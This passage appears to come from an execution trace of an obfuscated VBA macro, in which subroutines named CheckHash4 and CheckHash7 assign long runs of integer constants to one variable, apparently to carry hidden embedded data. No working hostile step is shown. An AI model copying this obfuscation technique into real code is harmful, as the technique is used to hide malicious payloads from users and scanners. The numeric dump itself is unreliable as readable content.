                            6028

                            Y = 59279753

                            6029

                            Y = 810964566

                            6030

                            Y = - 1583176797

                            6031

                            Y = - 2057018011

                            6032

                            Y = - 1050121877

                            6033

                            Y = - 389165105

                            6034

                            Y = - 1512725

                            6035

                            Y = - 2894120

                            6036

                            Y = - 2104605

                            6037

                            Y = - 1315090

                            6038

                            Y = - 2828584

                            6039

                            Y = - 4670787

                            6040

                            Y = - 72108617

                            6041

                            Y = - 104084017

                            6042

                            Y = - 1249553

                            6043

                            Y = - 1447188

                            6044

                            Y = - 2762533

                            6045

                            Y = - 3354669

                            6046

                            Y = - 2433825

                            6047

                            Y = - 4276029

                            6048

                            Y = - 21381952

                            6049

                            Y = - 121453368

                            6050

                            Y = - 70332204

                            6051

                            Y = - 192312175

                            6052

                            Y = - 142375025

                            6053

                            Y = - 2076492735

                            6054

                            Y = 120993850

                            6055

                            For I = 1 To 6

                            6056

                            Y = 0

                            6057

                            Next

                            6058

                            End Sub

                            LineInstructionMeta Information
                            4595

                            Private Sub CheckHash4()

                            4596

                            For I = 1 To 5

                            executed
                            4597

                            Y = 0

                            4598

                            Next

                            4599

                            Y = 1026699826

                            4600

                            Y = - 1381139

                            4601

                            Y = - 1446932

                            4602

                            Y = - 1512725

                            4603

                            Y = - 1578517

                            4604

                            Y = - 1644310

                            4605

                            Y = - 1710103

                            4606

                            Y = - 4472893

                            4607

                            Y = - 1973275

                            4608

                            Y = - 5328459

                            4609

                            For I = 1 To 2

                            4610

                            Y = - 5130564

                            4611

                            Next

                            4612

                            Y = - 2025502902

                            4613

                            Y = 268435456

                            4614

                            For I = 1 To 14

                            4615

                            Y = 0

                            4616

                            Next

                            4617

                            Y = 1247303768

                            4618

                            For I = 1 To 2

                            4619

                            Y = - 197380

                            4620

                            Next

                            4621

                            Y = - 5591372

                            4622

                            Y = - 9209983

                            4623

                            Y = - 3420717

                            4624

                            Y = - 3486510

                            4625

                            Y = - 3552303

                            4626

                            Y = - 3618095

                            4627

                            Y = - 3683632

                            4628

                            Y = - 3814961

                            4629

                            Y = - 8617852

                            4630

                            For I = 1 To 2

                            4631

                            Y = - 7038561

                            4632

                            Next

                            4633

                            Y = 1056964608

                            4634

                            For I = 1 To 5

                            4635

                            Y = 0

                            4636

                            Next

                            4637

                            Y = 724709938

                            4638

                            Y = - 505552672

                            4639

                            Y = - 1380883

                            4640

                            Y = - 1446931

                            4641

                            Y = - 1446932

                            4642

                            Y = - 1578261

                            4643

                            Y = - 1644054

                            4644

                            Y = - 4407101

                            4645

                            Y = - 2170397

                            4646

                            Y = - 5657424

                            4647

                            Y = - 5525578

                            4648

                            Y = - 5591371

                            4649

                            Y = - 1688774051

                            4650

                            Y = 335544320

                            4651

                            For I = 1 To 13

                            4652

                            Y = 0

                            4653

                            Next

                            4654

                            Y = 70398514

                            4655

                            Y = 1754041484

                            4656

                            Y = - 460551

                            4657

                            Y = - 526344

                            4658

                            Y = - 5788751

                            4659

                            Y = - 9144190

                            4660

                            Y = - 3354668

                            4661

                            Y = - 3420461

                            4662

                            Y = - 3486253

                            4663

                            Y = - 3552046

                            4664

                            Y = - 3617839

                            4665

                            Y = - 3683632

                            4666

                            Y = - 8288886

                            4667

                            For I = 1 To 2

                            4668

                            Y = - 7038561

                            4669

                            Next

                            4670

                            Y = 822083584

                            4671

                            For I = 1 To 5

                            4672

                            Y = 0

                            4673

                            Next

                            4674

                            Y = 221393458

                            4675

                            Y = 825373234

                            4676

                            Y = 1785753713

                            4677

                            Y = - 1668247150

                            4678

                            Y = - 726222663

                            4679

                            Y = - 1446932

                            4680

                            Y = - 1512725

                            4681

                            Y = - 3617841

                            4682

                            Y = - 2630947

                            4683

                            Y = - 4802116

                            4684

                            Y = - 5920337

                            4685

                            Y = - 6512473

                            4686

                            Y = - 729708918

                            4687

                            Y = 536870912

                            4688

                            For I = 1 To 13

                            4689

                            Y = 0

                            4690

                            Next

                            4691

                            Y = 271725106

                            4692

                            Y = - 1463696958

                            4693

                            Y = - 789259

                            4694

                            Y = - 1381395

                            4695

                            Y = - 5920337

                            4696

                            Y = - 7499111

                            4697

                            Y = - 3223339

                            4698

                            Y = - 3289131

                            4699

                            Y = - 4999750

                            4700

                            Y = - 6512733

                            4701

                            Y = - 7170406

                            4702

                            Y = - 192838263

                            4703

                            Y = - 797804935

                            4704

                            Y = - 1536989334

                            4705

                            Y = 1530608959

                            4706

                            Y = 318767104

                            4707

                            For I = 1 To 6

                            4708

                            Y = 0

                            4709

                            Next

                            4710

                            Y = 53621298

                            4711

                            Y = 221393458

                            4712

                            Y = 607269426

                            4713

                            Y = 2121298290

                            4714

                            Y = - 1380883

                            4715

                            Y = - 1446931

                            4716

                            Y = - 3025705

                            4717

                            Y = - 3157548

                            4718

                            Y = - 3880756

                            4719

                            Y = - 6840926

                            4720

                            Y = - 7433318

                            4721

                            Y = - 125991798

                            4722

                            Y = 922746880

                            4723

                            Y = 50331648

                            4724

                            For I = 1 To 12

                            4725

                            Y = 0

                            4726

                            Next

                            4727

                            Y = 556937778

                            4728

                            Y = - 673325602

                            4729

                            Y = - 920845

                            4730

                            Y = - 2302496

                            4731

                            Y = - 6446424

                            4732

                            Y = - 6117716

                            4733

                            Y = - 3157545

                            4734

                            Y = - 9472904

                            4735

                            Y = - 10130062

                            4736

                            Y = - 9669253

                            4737

                            Y = - 1305134532

                            4738

                            Y = 1174865671

                            4739

                            Y = 637731587

                            4740

                            Y = 385875968

                            4741

                            Y = 167772160

                            4742

                            Y = 33554432

                            4743

                            For I = 1 To 8

                            4744

                            Y = 0

                            4745

                            Next

                            4746

                            Y = 103952946

                            4747

                            Y = 1244803634

                            4748

                            Y = - 253499930

                            4749

                            Y = - 1315346

                            4750

                            Y = - 2236447

                            4751

                            Y = - 3815220

                            4752

                            Y = - 1512724

                            4753

                            Y = - 7367271

                            4754

                            Y = - 8354163

                            4755

                            Y = - 8617335

                            4756

                            Y = - 2044384722

                            4757

                            Y = 285212672

                            4758

                            For I = 1 To 11

                            4759

                            Y = 0

                            4760

                            Next

                            4761

                            Y = 120730162

                            4762

                            Y = 1213091406

                            4763

                            Y = - 118295821

                            4764

                            Y = - 789259

                            4765

                            Y = - 3486512

                            4766

                            Y = - 6841438

                            4767

                            Y = - 4670270

                            4768

                            Y = - 3091496

                            4769

                            Y = - 11840422

                            4770

                            Y = - 12431528

                            4771

                            Y = - 12365735

                            4772

                            Y = 1695815707

                            4773

                            Y = 134217728

                            4774

                            For I = 1 To 11

                            4775

                            Y = 0

                            4776

                            Next

                            4777

                            Y = 36844082

                            4778

                            Y = 439497266

                            4779

                            Y = 1969513572

                            4780

                            Y = - 253434394

                            4781

                            Y = - 1249553

                            4782

                            Y = - 1315346

                            4783

                            Y = - 4078135

                            4784

                            Y = - 1973275

                            4785

                            Y = - 4670273

                            4786

                            Y = - 8288628

                            4787

                            Y = - 9209985

                            4788

                            Y = - 212115096

                            4789

                            Y = 905969664

                            4790

                            Y = 100663296

                            4791

                            For I = 1 To 9

                            4792

                            Y = 0

                            4793

                            Next

                            4794

                            Y = 36844082

                            4795

                            Y = 540160562

                            4796

                            Y = - 1111177785

                            4797

                            Y = - 1052430

                            4798

                            Y = - 1184017

                            4799

                            Y = - 5196871

                            4800

                            Y = - 6710109

                            4801

                            Y = - 2894374

                            4802

                            Y = - 4999493

                            4803

                            Y = - 12301231

                            4804

                            Y = - 11774370

                            4805

                            Y = - 146452650

                            4806

                            Y = 1392508928

                            4807

                            Y = 184549376

                            4808

                            For I = 1 To 10

                            4809

                            Y = 0

                            4810

                            Next

                            4811

                            Y = 36844082

                            4812

                            Y = 439497266

                            4813

                            Y = 1835822188

                            4814

                            Y = - 253236502

                            4815

                            Y = - 1117711

                            4816

                            Y = - 1183504

                            4817

                            Y = - 1249297

                            4818

                            Y = - 2893863

                            4819

                            Y = - 3354670

                            4820

                            Y = - 1315346

                            4821

                            Y = - 6446683

                            4822

                            Y = - 9538951

                            4823

                            Y = - 10131087

                            4824

                            Y = - 1170324664

                            4825

                            Y = 603979776

                            4826

                            Y = 83886080

                            4827

                            For I = 1 To 7

                            4828

                            Y = 0

                            4829

                            Next

                            4830

                            Y = 20066866

                            4831

                            Y = 305279538

                            4832

                            Y = 1954644354

                            4833

                            Y = - 84938511

                            4834

                            Y = - 986894

                            4835

                            Y = - 2828583

                            4836

                            Y = - 5657422

                            4837

                            Y = - 4933699

                            4838

                            Y = - 2828325

                            4839

                            Y = - 2894118

                            4840

                            Y = - 7630957

                            4841

                            Y = - 11577764

                            4842

                            Y = - 11116955

                            4843

                            Y = - 717142196

                            4844

                            Y = 922746880

                            4845

                            Y = 150994944

                            4846

                            For I = 1 To 9

                            4847

                            Y = 0

                            4848

                            Next

                            4849

                            Y = 120730162

                            4850

                            Y = 1501791107

                            4851

                            Y = - 253039380

                            4852

                            Y = - 920589

                            4853

                            Y = - 986382

                            4854

                            Y = - 1052175

                            4855

                            Y = - 1117968

                            4856

                            Y = - 1381139

                            4857

                            Y = - 4012086

                            4858

                            Y = - 1907482

                            4859

                            Y = - 2302241

                            4860

                            Y = - 6907235

                            4861

                            Y = - 10328465

                            4862

                            Y = - 10986395

                            4863

                            Y = - 1371848892

                            4864

                            Y = 654311424

                            4865

                            Y = 100663296

                            4866

                            For I = 1 To 5

                            4867

                            Y = 0

                            4868

                            Next

                            4869

                            Y = 53621298

                            4870

                            Y = 355611186

                            4871

                            Y = 1532911198

                            4872

                            Y = - 371006492

                            4873

                            Y = - 1184016

                            4874

                            Y = - 1446931

                            4875

                            Y = - 4998980

                            4876

                            Y = - 5328457

                            4877

                            Y = - 2894118

                            4878

                            Y = - 2762532

                            4879

                            Y = - 2762789

                            4880

                            Y = - 2828582

                            4881

                            Y = - 7368041

                            4882

                            Y = - 11117728

                            4883

                            Y = - 10525333

                            4884

                            Y = - 733458862

                            4885

                            Y = 1023410176

                            4886

                            Y = 201326592

                            4887

                            For I = 1 To 8

                            4888

                            Y = 0

                            4889

                            Next

                            4890

                            Y = 103952946

                            4891

                            Y = 1466460264

                            4892

                            Y = - 789003

                            4893

                            Y = - 854796

                            4894

                            Y = - 920589

                            4895

                            Y = - 986382

                            4896

                            Y = - 1052174

                            4897

                            Y = - 1117967

                            4898

                            Y = - 2433569

                            4899

                            Y = - 3617585

                            4900

                            Y = - 1578261

                            4901

                            Y = - 1315347

                            4902

                            Y = - 6512734

                            4903

                            Y = - 9999501

                            4904

                            Y = - 11709863

                            4905

                            Y = - 783856559

                            4906

                            Y = 956301312

                            4907

                            Y = 318767104

                            4908

                            Y = 67108864

                            4909

                            Y = 0

                            4910

                            Y = 36844082

                            4911

                            Y = 221393458

                            4912

                            Y = 724709938

                            4913

                            Y = 2088335994

                            4914

                            Y = - 253499930

                            4915

                            Y = - 1184017

                            4916

                            Y = - 1118223

                            4917

                            Y = - 4144440

                            4918

                            Y = - 4867907

                            4919

                            Y = - 3552304

                            4920

                            Y = - 2565410

                            4921

                            Y = - 2631203

                            4922

                            Y = - 2696996

                            4923

                            Y = - 2762788

                            4924

                            Y = - 2828581

                            4925

                            Y = - 5065031

                            4926

                            Y = - 9801867

                            4927

                            Y = - 9209472

                            4928

                            Y = - 395940750

                            4929

                            Y = 620756992

                            4930

                            For I = 1 To 8

                            4931

                            Y = 0

                            4932

                            Next

                            4933

                            Y = 36844082

                            4934

                            Y = 758264370

                            4935

                            Y = - 925772846

                            4936

                            Y = - 723211

                            4937

                            Y = - 789004

                            4938

                            Y = - 854797

                            4939

                            Y = - 920589

                            4940

                            Y = - 986382

                            4941

                            Y = - 1052175

                            4942

                            Y = - 2959913

                            4943

                            Y = - 3354927

                            4944

                            Y = - 1381140

                            4945

                            Y = - 1183760

                            4946

                            Y = - 4275774

                            4947

                            Y = - 7762799

                            4948

                            Y = - 10723224

                            4949

                            Y = - 78555811

                            4950

                            Y = - 867480236

                            4951

                            Y = 1998791720

                            4952

                            Y = 1276779034

                            4953

                            Y = 1479553329

                            4954

                            Y = - 2142285743

                            4955

                            Y = - 877086534

                            4956

                            Y = - 1184016

                            4957

                            Y = - 1315346

                            4958

                            Y = - 1249810

                            4959

                            Y = - 3223084

                            4960

                            Y = - 4275769

                            4961

                            Y = - 3288876

                            4962

                            Y = - 2433568

                            4963

                            Y = - 2499361

                            4964

                            Y = - 2565154

                            4965

                            Y = - 2630947

                            4966

                            Y = - 2696739

                            4967

                            Y = - 2762532

                            4968

                            Y = - 5394509

                            4969

                            Y = - 8815227

                            4970

                            Y = - 7959917

                            4971

                            Y = - 495881092

                            4972

                            Y = 637534208

                            4973

                            For I = 1 To 9

                            4974

                            Y = 0

                            4975

                            Next

                            4976

                            Y = 254947890

                            4977

                            Y = 1533437798

                            4978

                            Y = - 252776209

                            4979

                            Y = - 1196050762

                            4980

                            Y = - 1284608145

                            4981

                            Y = - 76582538

                            4982

                            Y = - 121124663

                            4983

                            Y = - 986382

                            4984

                            Y = - 1052174

                            4985

                            Y = - 3157035

                            4986

                            Y = - 3223084

                            4987

                            Y = - 1578261

                            4988

                            Y = - 1117968

                            4989

                            Y = - 1183504

                            4990

                            Y = - 2894120

                            4991

                            Y = - 5197130

                            4992

                            Y = - 6973541

                            4993

                            Y = - 74411114

                            4994

                            Y = - 157178714

                            4995

                            Y = - 137836085

                            4996

                            Y = - 1249552

                            4997

                            Y = - 1118224

                            4998

                            Y = - 1249809

                            4999

                            Y = - 1381139

                            5000

                            Y = - 3617585

                            5001

                            Y = - 3880755

                            5002

                            Y = - 2499617

                            5003

                            Y = - 2236446

                            5004

                            Y = - 3157549

                            5005

                            Y = - 2368032

                            5006

                            Y = - 2433824

                            5007

                            Y = - 2499617

                            5008

                            Y = - 2565410

                            5009

                            Y = - 2631203

                            5010

                            Y = - 8947073

                            5011

                            Y = - 7959918

                            5012

                            Y = - 7630952

                            5013

                            Y = 1814571308

                            5014

                            Y = 251658240

                            5015

                            For I = 1 To 9

                            5016

                            Y = 0

                            5017

                            Next

                            5018

                            Y = 36844082

                            5019

                            Y = 305279538

                            5020

                            Y = 691155506

                            5021

                            Y = 690958127

                            5022

                            Y = 639376412

                            5023

                            Y = 1007883027

                            5024

                            Y = 2000173369

                            5025

                            Y = - 438575652

                            5026

                            Y = - 920589

                            5027

                            Y = - 1051918

                            5028

                            Y = - 2696998

                            5029

                            Y = - 4078135

                            5030

                            Y = - 2236192

                            5031

                            Y = - 1052431

                            5032

                            Y = - 1117967

                            5033

                            Y = - 1117968

                            5034

                            Y = - 1117967

                            5035

                            Y = - 1117968

                            5036

                            Y = - 1183760

                            5037

                            Y = - 1184016

                            5038

                            Y = - 1184017

                            5039

                            Y = - 1315346

                            5040

                            Y = - 2170654

                            5041

                            Y = - 4143927

                            5042

                            Y = - 3354926

                            5043

                            Y = - 2039067

                            5044

                            Y = - 2104860

                            5045

                            Y = - 2960169

                            5046

                            Y = - 9078402

                            5047

                            Y = - 9275780

                            5048

                            Y = - 41580403

                            5049

                            Y = - 509829471

                            5050

                            Y = - 2499617

                            5051

                            Y = - 595228791

                            5052

                            Y = - 479959187

                            5053

                            Y = - 7762281

                            5054

                            Y = - 1201708439

                            5055

                            Y = 587202560

                            5056

                            Y = 33554432

                            5057

                            For I = 1 To 14

                            5058

                            Y = 0

                            5059

                            Next

                            5060

                            Y = 53621298

                            5061

                            Y = 1093808690

                            5062

                            Y = - 488578334

                            5063

                            Y = - 854796

                            5064

                            Y = - 920589

                            5065

                            Y = - 986382

                            5066

                            Y = - 1775897

                            5067

                            Y = - 3486256

                            5068

                            Y = - 3814964

                            5069

                            Y = - 2762535

                            5070

                            Y = - 1907482

                            5071

                            Y = - 1381395

                            5072

                            Y = - 1184016

                            5073

                            Y = - 1380882

                            5074

                            Y = - 1973019

                            5075

                            Y = - 2828326

                            5076

                            Y = - 3946550

                            5077

                            Y = - 3946293

                            5078

                            Y = - 2499105

                            5079

                            Y = - 1907225

                            5080

                            Y = - 1973018

                            5081

                            Y = - 2038811

                            5082

                            Y = - 9144452

                            5083

                            Y = - 8354420

                            5084

                            Y = - 7959404

                            5085

                            Y = - 1741737933

                            5086

                            Y = 1176510496

                            5087

                            Y = 1212828491

                            5088

                            Y = 907943454

                            5089

                            Y = 856098567

                            5090

                            Y = 1126179107

                            5091

                            Y = 553648128

                            5092

                            Y = 117440512

                            5093

                            For I = 1 To 15

                            5094

                            Y = 0

                            5095

                            Next

                            5096

                            Y = 204616242

                            5097

                            Y = 1769042545

                            5098

                            Y = - 723210

                            5099

                            Y = - 789003

                            5100

                            Y = - 854796

                            5101

                            For I = 1 To 2

                            5102

                            Y = - 920589

                            5103

                            Next

                            5104

                            Y = - 1051918

                            5105

                            Y = - 1841433

                            5106

                            Y = - 2828070

                            5107

                            Y = - 3420207

                            5108

                            Y = - 4144185

                            5109

                            Y = - 4144441

                            5110

                            Y = - 4209979

                            5111

                            Y = - 3486512

                            5112

                            Y = - 3091242

                            5113

                            Y = - 2236447

                            5114

                            Y = - 1644310

                            5115

                            Y = - 1710103

                            5116

                            Y = - 1775896

                            5117

                            Y = - 1841689

                            5118

                            Y = - 1907482

                            5119

                            Y = - 8881023

                            5120

                            Y = - 8156527

                            5121

                            Y = - 7761768

                            5122

                            Y = - 2144259017

                            5123

                            Y = 302187267

                            5124

                            Y = 36844082

                            5125

                            Y = 20066866

                            5126

                            Y = 16777216

                            5127

                            Y = 33554432

                            5128

                            Y = 16777216

                            5129

                            For I = 1 To 16

                            5130

                            Y = 0

                            5131

                            Next

                            5132

                            Y = 456274482

                            5133

                            Y = - 1784766561

                            5134

                            Y = - 591625

                            5135

                            Y = - 657418

                            5136

                            Y = - 723211

                            5137

                            Y = - 789003

                            5138

                            Y = - 1775898

                            5139

                            Y = - 920589

                            5140

                            Y = - 986382

                            5141

                            Y = - 1052175

                            5142

                            Y = - 1117968

                            5143

                            Y = - 1183760

                            5144

                            Y = - 1249553

                            5145

                            Y = - 1315346

                            5146

                            Y = - 1381139

                            5147

                            Y = - 1446932

                            5148

                            Y = - 1512725

                            5149

                            Y = - 1578517

                            5150

                            Y = - 1644310

                            5151

                            Y = - 1710103

                            5152

                            Y = - 1775896

                            5153

                            Y = - 1841689

                            5154

                            Y = - 5855061

                            5155

                            Y = - 6710111

                            5156

                            Y = - 5722958

                            5157

                            Y = - 914916738

                            5158

                            Y = 553648128

                            5159

                            For I = 1 To 21

                            5160

                            Y = 0

                            5161

                            Next

                            5162

                            Y = 489828914

                            5163

                            Y = - 1143876911

                            5164

                            Y = - 525832

                            5165

                            Y = - 591625

                            5166

                            Y = - 657418

                            5167

                            Y = - 1578519

                            5168

                            Y = - 7434093

                            5169

                            Y = - 7368300

                            5170

                            Y = - 23619430

                            5171

                            Y = - 119479582

                            5172

                            Y = - 1052174

                            5173

                            Y = - 1117711

                            5174

                            Y = - 1183504

                            5175

                            Y = - 1249297

                            5176

                            Y = - 2894378

                            5177

                            Y = - 4539203

                            5178

                            Y = - 6842213

                            5179

                            Y = - 20592438

                            5180

                            Y = - 1578261

                            5181

                            Y = - 1644054

                            5182

                            Y = - 1644310

                            5183

                            Y = - 1710103

                            5184

                            Y = - 3683893

                            5185

                            Y = - 6710112

                            5186

                            Y = - 4933700

                            5187

                            Y = - 291659868

                            5188

                            Y = 905969664

                            5189

                            Y = 16777216

                            5190

                            For I = 1 To 20

                            5191

                            Y = 0

                            5192

                            Next

                            5193

                            Y = 204616242

                            5194

                            Y = 1196708948

                            5195

                            Y = - 1110783030

                            5196

                            Y = - 525832

                            5197

                            Y = - 591624

                            5198

                            Y = - 309555569

                            5199

                            Y = - 5789267

                            5200

                            Y = - 5131336

                            5201

                            Y = - 1336848045

                            5202

                            Y = - 944260680

                            5203

                            Y = - 920589

                            5204

                            Y = - 986382

                            5205

                            Y = - 1052175

                            5206

                            Y = - 1117968

                            5207

                            Y = - 6315870

                            5208

                            Y = - 6710626

                            5209

                            Y = - 5986902

                            5210

                            Y = - 732144289

                            5211

                            Y = - 186851617

                            5212

                            Y = - 1512725

                            5213

                            Y = - 1578517

                            5214

                            Y = - 1644310

                            5215

                            Y = - 1710103

                            5216

                            Y = - 6184025

                            5217

                            Y = - 4868164

                            5218

                            Y = - 4736578

                            5219

                            Y = 1346782792

                            5220

                            Y = 50331648

                            5221

                            For I = 1 To 20

                            5222

                            Y = 0

                            5223

                            Next

                            5224

                            Y = 20066866

                            5225

                            Y = 204616242

                            5226

                            Y = 775041586

                            5227

                            Y = 1904641670

                            5228

                            Y = - 2036293216

                            5229

                            Y = 1276647448

                            5230

                            Y = - 2107942051

                            5231

                            Y = - 1804109445

                            5232

                            Y = 1058477847

                            5233

                            Y = - 1583045211

                            5234

                            Y = - 854796

                            5235

                            Y = - 920589

                            5236

                            Y = - 986382

                            5237

                            Y = - 1052174

                            5238

                            Y = - 6644834

                            5239

                            Y = - 4999752

                            5240

                            Y = - 4670786

                            5241

                            Y = - 2075834808

                            5242

                            Y = 1952802406

                            5243

                            Y = - 253631515

                            5244

                            Y = - 1512724

                            5245

                            Y = - 271724335

                            5246

                            Y = - 57108069

                            5247

                            Y = - 5526352

                            5248

                            Y = - 190207058

                            5249

                            Y = - 2041096102

                            5250

                            Y = 452984832

                            5251

                            Y = 16777216

                            5252

                            For I = 1 To 22

                            5253

                            Y = 0

                            5254

                            Next

                            5255

                            Y = 70398514

                            5256

                            Y = 238170674

                            5257

                            Y = 271725106

                            5258

                            Y = 169745950

                            5259

                            Y = 234881024

                            5260

                            Y = 268435456

                            5261

                            Y = 354624291

                            5262

                            Y = 1937735808

                            5263

                            Y = - 723211

                            5264

                            Y = - 789004

                            5265

                            Y = - 854797

                            5266

                            Y = - 920589

                            5267

                            Y = - 6776163

                            5268

                            Y = - 4604993

                            5269

                            Y = - 4473407

                            5270

                            Y = 1124205058

                            5271

                            Y = 523054381

                            5272

                            Y = 1804176010

                            5273

                            Y = - 2053662567

                            5274

                            Y = 1361323044

                            5275

                            Y = - 2074453155

                            5276

                            Y = - 1686932361

                            5277

                            Y = 989855744

                            5278

                            Y = 352321536

                            5279

                            Y = 67108864

                            5280

                            For I = 1 To 29

                            5281

                            Y = 0

                            5282

                            Next

                            5283

                            Y = 53621298

                            5284

                            Y = 791818802

                            5285

                            Y = - 925378345

                            5286

                            Y = - 723211

                            5287

                            Y = - 789003

                            5288

                            Y = - 120927028

                            5289

                            Y = - 5723732

                            5290

                            Y = - 4342078

                            5291

                            Y = - 543055194

                            5292

                            Y = 654311424

                            5293

                            Y = 70398514

                            5294

                            Y = 238170674

                            5295

                            Y = 271725106

                            5296

                            Y = 169745950

                            5297

                            Y = 234881024

                            5298

                            Y = 268435456

                            5299

                            Y = 100663296

                            5300

                            For I = 1 To 32

                            5301

                            Y = 0

                            5302

                            Next

                            5303

                            Y = 204616242

                            5304

                            Y = 657601074

                            5305

                            Y = 993145394

                            5306

                            Y = 1143679787

                            5307

                            Y = 1209735963

                            5308

                            Y = 1124599816

                            5309

                            Y = 989855744

                            5310

                            Y = 654311424

                            5311

                            Y = 184549376

                            5312

                            End Sub

                            LineInstructionMeta Information
                            6915

                            Private Sub CheckHash7()

                            6916

                            Y = 1885420576

                            executed
                            6917

                            Y = 1667853424

                            6918

                            Y = 1869182049

                            6919

                            Y = 168640110

                            6920

                            Y = 538976288

                            6921

                            Y = 557588512

                            6922

                            Y = - 803197651

                            6923

                            Y = - 792735583

                            6924

                            Y = - 796798536

                            6925

                            Y = 549114046

                            6926

                            Y = - 1244613936

                            6927

                            Y = - 2116976431

                            6928

                            Y = - 1177503536

                            6929

                            Y = 1852397344

                            6930

                            Y = 1937207140

                            6931

                            Y = - 1261428692

                            6932

                            Y = - 1882080304

                            6933

                            Y = - 796864224

                            6934

                            Y = - 793653072

                            6935

                            Y = - 779955778

                            6936

                            Y = - 2117001077

                            6937

                            Y = - 793063392

                            6938

                            Y = - 796732994

                            6939

                            Y = - 780086850

                            6940

                            Y = - 792932213

                            6941

                            Y = - 1076879176

                            6942

                            Y = - 1244626735

                            6943

                            Y = - 1110395696

                            6944

                            Y = - 1211060016

                            6945

                            Y = - 1328497200

                            6946

                            Y = - 1244624943

                            6947

                            Y = - 1093616176

                            6948

                            Y = - 793456608

                            6949

                            Y = - 792866640

                            6950

                            Y = - 792801091

                            6951

                            Y = - 1076879179

                            6952

                            Y = - 1194295087

                            6953

                            Y = - 1093616688

                            6954

                            Y = - 1244612912

                            6955

                            Y = - 1194279472

                            6956

                            Y = 539932112

                            6957

                            Y = 538970637

                            6958

                            Y = 538976288

                            6959

                            Y = 1684957527

                            6960

                            Y = 544438127

                            6961

                            Y = - 1294946096

                            6962

                            Y = - 1093631279

                            6963

                            Y = - 1328497456

                            6964

                            Y = - 1194294575

                            6965

                            Y = - 1244624943

                            6966

                            Y = - 1160740399

                            6967

                            Y = - 803161904

                            6968

                            Y = - 796143182

                            6969

                            Y = - 776613711

                            6970

                            Y = - 776613760

                            6971

                            Y = - 1110433662

                            6972

                            Y = - 1194282800

                            6973

                            Y = - 1093619248

                            6974

                            Y = - 1244611632

                            6975

                            Y = - 786385456

                            6976

                            Y = - 792801151

                            6977

                            Y = - 792932174

                            6978

                            Y = - 780021323

                            6979

                            Y = - 793194366

                            6980

                            Y = - 779890244

                            6981

                            Y = - 2117001074

                            6982

                            Y = - 1244626735

                            6983

                            Y = - 2083408688

                            6984

                            Y = 1043148078

                            6985

                            Y = 168626701

                            6986

                            Y = 538976288

                            6987

                            Y = 557588512

                            6988

                            Y = - 803197651

                            6989

                            Y = - 796798571

                            6990

                            Y = 548982971

                            6991

                            Y = - 2133737520

                            6992

                            Y = - 1143949104

                            6993

                            Y = - 1227833648

                            6994

                            Y = - 1110395440

                            6995

                            Y = - 1244612400

                            6996

                            Y = - 775958496

                            6997

                            Y = - 793390976

                            6998

                            Y = - 792866636

                            6999

                            Y = - 793259856

                            7000

                            Y = - 776941379

                            7001

                            Y = - 793390969

                            7002

                            Y = 549376189

                            7003

                            Y = - 1143950128

                            7004

                            Y = - 786395183

                            7005

                            Y = - 793718656

                            7006

                            Y = - 776023887

                            7007

                            Y = 546034050

                            7008

                            Y = 1461748177

                            7009

                            Y = 1868852841

                            7010

                            Y = 1444967287

                            7011

                            Y = 1635021673

                            7012

                            Y = - 2117001172

                            7013

                            Y = - 1194279472

                            7014

                            Y = - 1194279728

                            7015

                            Y = - 1244626223

                            7016

                            Y = - 793063392

                            7017

                            Y = - 792932162

                            7018

                            Y = - 793390916

                            7019

                            Y = - 796732995

                            7020

                            Y = - 796864080

                            7021

                            Y = 549048504

                            7022

                            Y = - 1093631535

                            7023

                            Y = - 796798688

                            7024

                            Y = - 793390917

                            7025

                            Y = - 779890252

                            7026

                            Y = - 796274290

                            7027

                            Y = - 793521995

                            7028

                            Y = - 2083446594

                            7029

                            Y = - 1143949360

                            7030

                            Y = 1931522256

                            7031

                            Y = 1869639797

                            7032

                            Y = 1684370546

                            7033

                            Y = 757945167

                            7034

                            Y = 537529662

                            7035

                            Y = 538976288

                            7036

                            Y = 757152800

                            7037

                            Y = 1970486317

                            7038

                            Y = 1919905904

                            7039

                            Y = 1331979636

                            7040

                            Y = 1682514003

                            7041

                            Y = 1702568509

                            7042

                            Y = 825307186

                            7043

                            Y = 758592820

                            7044

                            Y = 909391153

                            7045

                            Y = 1664300077

                            7046

                            Y = 895561013

                            7047

                            Y = 808281446

                            7048

                            Y = 1701066800

                            7049

                            Y = 1681089893

                            7050

                            Y = 2100323891

                            7051

                            Y = 792477218

                            7052

                            Y = 1886418291

                            7053

                            Y = 1702130287

                            7054

                            Y = 1045647204

                            7055

                            Y = 222178605

                            7056

                            Y = 537529610

                            7057

                            Y = 538976288

                            7058

                            Y = 757152800

                            7059

                            Y = - 1781522387

                            7060

                            Y = - 1143963183

                            7061

                            Y = - 803161904

                            7062

                            Y = - 776941390

                            7063

                            Y = 548786312

                            7064

                            Y = - 2133737520

                            7065

                            Y = - 1143949104

                            7066

                            Y = - 1227833648

                            7067

                            Y = - 1110395440

                            7068

                            Y = - 1244612400

                            7069

                            Y = - 775958496

                            7070

                            Y = - 793390976

                            7071

                            Y = - 792866636

                            7072

                            Y = - 793259856

                            7073

                            Y = - 776941379

                            7074

                            Y = - 793390969

                            7075

                            Y = 549376189

                            7076

                            Y = - 1143950128

                            7077

                            Y = - 786395183

                            7078

                            Y = - 793718656

                            7079

                            Y = - 776023887

                            7080

                            Y = 546034050

                            7081

                            Y = 1461748177

                            7082

                            Y = 1868852841

                            7083

                            Y = 924873591

                            7084

                            Y = - 2133778388

                            7085

                            Y = - 2116964144

                            7086

                            Y = - 1093616944

                            7087

                            Y = - 1127170864

                            7088

                            Y = - 1110395440

                            7089

                            Y = - 1194294575

                            7090

                            Y = - 2083421999

                            7091

                            Y = - 2100184624

                            7092

                            Y = - 786385456

                            7093

                            Y = - 792997759

                            7094

                            Y = - 776679243

                            7095

                            Y = - 779169405

                            7096

                            Y = - 793194359

                            7097

                            Y = - 2083446599

                            7098

                            Y = - 1244612656

                            7099

                            Y = 1931525072

                            7100

                            Y = 1869639797

                            7101

                            Y = 1684370546

                            7102

                            Y = 757945167

                            7103

                            Y = 537529662

                            7104

                            Y = 538976288

                            7105

                            Y = 757152800

                            7106

                            Y = 1970486317

                            7107

                            Y = 1919905904

                            7108

                            Y = 1331979636

                            7109

                            Y = 1682514003

                            7110

                            Y = 863707709

                            7111

                            Y = 942879029

                            7112

                            Y = 761346402

                            7113

                            Y = 909730869

                            7114

                            Y = 1650865197

                            7115

                            Y = 1698180452

                            7116

                            Y = 1630364722

                            7117

                            Y = 808727602

                            7118

                            Y = 1714762290

                            7119

                            Y = 2103522105

                            7120

                            Y = 759050018

                            7121

                            Y = 168640045

                            7122

                            Y = 538970637

                            7123

                            Y = 538976288

                            7124

                            Y = 757932348

                            7125

